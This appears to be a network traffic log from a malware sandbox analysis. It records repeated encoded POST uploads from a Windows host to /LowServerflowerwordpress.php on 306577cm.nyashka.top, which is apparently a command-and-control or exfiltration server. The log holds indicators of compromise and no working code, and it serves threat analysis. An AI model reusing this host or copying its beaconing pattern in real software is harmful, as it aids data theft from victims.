Jan 7, 2025 11:57:33.755853891 CET	9888	OUT	Data Raw: 05 2e 5c 34 39 59 38 5d 39 0a 50 5c 36 0a 36 3a 3a 5c 16 2f 3b 39 21 1e 2b 3a 01 25 26 31 2c 12 36 38 1d 32 2a 02 0e 09 2d 07 3a 59 36 34 02 08 3b 02 16 31 27 34 22 55 3c 31 10 21 28 33 26 5e 0f 24 30 1f 09 3f 06 1a 3a 59 0d 03 31 00 51 5f 3b 0e Data Ascii: .\49Y8]9P\66::\/;9!+:%&1,682-:Y64;1'4"U<1!(3&^$0?:Y1Q_;=%=0X.#=U7994!$! >=U;>79S16$9+,,,#)=(?%-%;?6:&02Z$Y(=X&06>7$ ,>,<+^?Y9]0X(:Z\#"?3]<V?-&=1(&1#B
Jan 7, 2025 11:57:33.755933046 CET	4944	OUT	Data Raw: 26 2d 3b 1a 2a 5c 2b 2f 0e 05 2d 1e 39 2b 20 15 0b 05 13 54 05 01 2c 1f 3a 02 1e 25 3c 33 3e 00 15 29 27 1c 0a 2a 13 27 09 3d 2f 2f 31 38 1e 1d 01 07 29 55 34 2a 3a 3d 3d 15 35 3c 3c 1f 31 15 22 59 26 19 32 09 03 37 3f 1d 02 1b 38 08 20 3b 3a 36 Data Ascii: &-;\+/-9+ T,:%<3>)''=//18)U4:==5<<1"Y&27?8 ;:6 ';+8ZAZ?/]P3$@925W 2<;7.>+(/&9<^X=4->^<88+$- _24 4V)20>;(;Z\35Y:?%0&X=77:#42Z?^'>>;>6.-9_.+',=%<C(4$.4')7W)T9><
Jan 7, 2025 11:57:33.796535969 CET	34608	OUT	Data Raw: 0b 37 3c 56 0f 2b 1c 1a 0b 2e 14 05 0d 5b 27 37 28 39 27 1e 3f 05 23 5c 3b 3f 28 14 2d 32 5d 2e 31 28 2c 25 0c 24 0f 55 30 5e 50 5d 0a 54 12 3a 06 38 3f 18 05 29 30 1f 00 5a 21 23 3a 0a 30 0b 3c 02 30 30 33 5e 1b 3d 05 33 00 2e 34 0e 13 04 0e 2a Data Ascii: 7<V+.['7(9'?#\;?(-2].1(,%$U0^P]T:8?)0Z!#:0<003^=3.4V-0= @(Y%^:-/&6Q/3=V61)<==33Z?>8T,'5<<017S-6_%9Y0;;<T[1#;.;B>?!+Y08DY;-+)(;-190:='Z>:&<\7;=_+3U8=)'X1-089)?"!%"
Jan 7, 2025 11:57:33.846276045 CET	1236	OUT	Data Raw: 32 05 23 3a 00 24 20 20 06 07 36 5b 0f 40 02 29 08 2d 20 34 24 29 17 31 07 57 0b 12 03 0c 0b 1b 39 06 30 17 0d 3f 57 59 0e 3d 5c 36 31 23 22 04 22 33 3d 14 3d 01 54 30 33 50 05 2a 27 0d 53 2b 35 08 21 0c 3a 27 21 28 09 08 05 3d 3e 05 32 1b 39 06 Data Ascii: 2#:$ 6[@)- 4$)1W90?WY=\61#""3==T03P'S+5!:'!(=>29S:?R4-,?,#6R888U&;AT- 6$-&%!11+[93";=8<,"+Z4(310.>#2((\8_=2/.<:<<)&-\V#">W&2&7WR8< X,$:':5:?:)7(;'?0 .?-_
Jan 7, 2025 11:57:33.862341881 CET	53148	OUT	Data Raw: 3d 07 2a 1a 38 5a 04 33 08 3f 3b 10 34 39 24 11 3f 11 1d 00 20 57 27 5c 2f 54 3a 37 31 3b 3c 5d 26 34 5d 2c 30 26 0d 1a 25 21 2f 11 33 28 37 2c 2a 02 30 08 2d 3d 0b 01 22 43 2c 52 0b 3c 52 56 0c 28 07 35 33 56 3a 02 2b 55 0f 27 0b 29 5f 3d 32 11 Data Ascii: =8Z3?;49$? W'\/T:71;<]&4],0&%!/3(7,0-="C,R<RV(53V:+U')_=2VX"2(Y%9VT//31RT/> 2-T[9>9?_U <?X8T5S;6P$-\.;=<.%;-#$Y1/Y#(#.X6+^";0( 19Y).@+(<_&8.W?"':,$+>9V>:=!;1='><.
Jan 7, 2025 11:57:33.867280960 CET	9888	OUT	Data Raw: 27 06 39 3d 20 51 2b 34 20 39 2e 10 0f 02 2e 5a 3b 04 02 1e 3c 00 3b 5c 22 5a 25 1a 39 2a 24 29 36 14 29 22 06 02 12 1e 08 3d 0e 21 09 3c 32 1e 25 2a 48 35 39 03 2d 31 0b 08 1d 05 24 39 24 2d 34 3c 5d 55 29 16 2e 1d 0a 5f 52 3e 08 30 31 0c 29 00 Data Ascii: '9= Q+4 9..Z;<;\"Z%9$)6)"=!<2%H59-1$9$-4<]U)._R>01)X/+9 8!=7?U<:'=A(8(T=+^9/&19Y-_?;"=+=T;;&):(93-8@$\-5V:)36X'(W>9-+.>VRY/(5+;$3Z0 )&S&]9#5<S). "=;70B.%
Jan 7, 2025 11:57:33.867357016 CET	4944	OUT	Data Raw: 0b 07 2c 17 0c 07 5a 09 05 21 39 13 02 54 3e 1d 09 5d 24 2f 25 01 1d 59 21 30 37 04 3d 33 2e 39 38 0e 0b 0f 3c 06 2c 12 36 35 24 13 0a 54 06 3f 3d 56 13 12 0d 36 18 5e 08 30 33 24 23 2f 0c 18 22 06 3a 2d 3a 04 05 0f 01 00 2c 10 29 42 1a 5b 32 0f Data Ascii: ,Z!9T>]$/%Y!07=3.98<,65$T?=V6^03$#/":-:,)B[2[;;!2;T>'<-.65T99& %'1'[8<#>\:(4+89X8,<3';5('?$8*,"2Y3,^:/]=$;S/::-;=3^18;)?P9/Y=>.??25 9< "2YY6V1_%=Y#(3?2W$/_;
Jan 7, 2025 11:57:34.049638987 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:34.999269962 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 34 5a 5f 57 Data Ascii: 4Z_W
Jan 7, 2025 11:57:34.999677896 CET	260	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 1860 Expect: 100-continue
Jan 7, 2025 11:57:35.193902969 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:35.765918016 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 06 12 25 00 23 34 38 09 27 2e 38 0f 30 01 2e 56 29 21 2d 10 3f 30 3d 01 24 28 2f 57 27 2f 28 01 22 02 23 1b 2b 3f 31 5c 22 20 2e 12 26 39 28 5c 00 1b 27 03 27 0c 05 54 2b 22 04 54 32 37 2a 5f 31 31 38 14 22 3d 2e 50 22 17 21 56 22 3d 0a 50 3a 07 27 1f 28 0a 0d 14 39 51 20 01 34 13 20 51 0d 17 38 1a 27 2e 09 02 33 05 26 59 36 34 37 08 37 1b 39 12 24 2c 2e 5b 25 3d 24 01 3c 29 3b 02 35 02 39 14 36 38 2c 0e 35 29 32 53 29 06 23 5d 22 00 20 52 0d 33 58 4f Data Ascii: %#48'.80.V)!-?0=$(/W'/("#+?1\" .&9(\''T+"T27*_118"=.P"!V"=P:'(9Q 4 Q8'.3&Y64779$,.[%=$<);5968,5)2S)#]" R3XO

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:57:33.533672094 CET	284	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Jan 7, 2025 11:57:33.886233091 CET	2536	OUT	Data Raw: 50 5f 59 58 5f 45 59 5b 5a 59 51 55 5a 5e 50 5c 55 52 5b 52 55 5e 54 52 59 59 59 51 5e 59 5d 5e 5c 5d 56 45 52 5a 56 5d 5f 51 54 5d 5b 5e 52 5a 56 57 5e 5c 5a 53 51 5f 52 57 50 5e 5b 56 5d 59 58 53 5a 58 5a 58 58 54 5f 58 5f 5e 5e 5c 5e 54 50 5f Data Ascii: P_YX_EY[ZYQUZ^P\UR[RU^TRYYYQ^Y]^\]VERZV]_QT][^RZVW^\ZSQ_RWP^[V]YXSZXZXXT_X_^^\^TP_\WVE\[SZYY[XZV^ZBVZ\[XZ]][_UGQ^G[QXXTP[PY\P\B[__[_ZXU^\_XRTWYRX[\]X\[@BYG[X_PUYS_]]^\]S_ZTQX_S]YTP[QXU&?Z< !V,'0'(\3<6R( $+## 94%[/ Q-
Jan 7, 2025 11:57:34.179107904 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:34.312792063 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 34 5a 5f 57 Data Ascii: 4Z_W

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:57:34.433623075 CET	260	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 2536 Expect: 100-continue
Jan 7, 2025 11:57:34.792484045 CET	2536	OUT	Data Raw: 50 5f 5c 58 5a 43 59 50 5a 59 51 55 5a 5a 50 52 55 5e 5b 53 55 5f 54 5c 59 59 59 51 5e 59 5d 5e 5c 5d 56 45 52 5a 56 5d 5f 51 54 5d 5b 5e 52 5a 56 57 5e 5c 5a 53 51 5f 52 57 50 5e 5b 56 5d 59 58 53 5a 58 5a 58 58 54 5f 58 5f 5e 5e 5c 5e 54 50 5f Data Ascii: P_\XZCYPZYQUZZPRU^[SU_T\YYYQ^Y]^\]VERZV]_QT][^RZVW^\ZSQ_RWP^[V]YXSZXZXXT_X_^^\^TP_\WVE\[SZYY[XZV^ZBVZ\[XZ]][_UGQ^G[QXXTP[PY\P\B[__[_ZXU^\_XRTWYRX[\]X\[@BYG[X_PUYS_]]^\]S_ZTQX_S]YTP[QXU&(&<3;5?]$#0;:$)[";=(W$,<^ 0<,$%[/ Q-0
Jan 7, 2025 11:57:35.148929119 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:35.284748077 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 34 5a 5f 57 Data Ascii: 4Z_W

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:57:35.403752089 CET	260	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 2536 Expect: 100-continue
Jan 7, 2025 11:57:35.761225939 CET	2536	OUT	Data Raw: 55 5d 5c 5f 5f 45 59 51 5a 59 51 55 5a 54 50 55 55 53 5b 52 55 54 54 5c 59 59 59 51 5e 59 5d 5e 5c 5d 56 45 52 5a 56 5d 5f 51 54 5d 5b 5e 52 5a 56 57 5e 5c 5a 53 51 5f 52 57 50 5e 5b 56 5d 59 58 53 5a 58 5a 58 58 54 5f 58 5f 5e 5e 5c 5e 54 50 5f Data Ascii: U]\__EYQZYQUZTPUUS[RUTT\YYYQ^Y]^\]VERZV]_QT][^RZVW^\ZSQ_RWP^[V]YXSZXZXXT_X_^^\^TP_\WVE\[SZYY[XZV^ZBVZ\[XZ]][_UGQ^G[QXXTP[PY\P\B[__[_ZXU^\_XRTWYRX[\]X\[@BYG[X_PUYS_]]^\]S_ZTQX_S]YTP[QXU&(9(< /36(T386$=X!=8W(9T3 3(-$%[/ Q-
Jan 7, 2025 11:57:36.068006039 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:36.201128960 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 34 5a 5f 57 Data Ascii: 4Z_W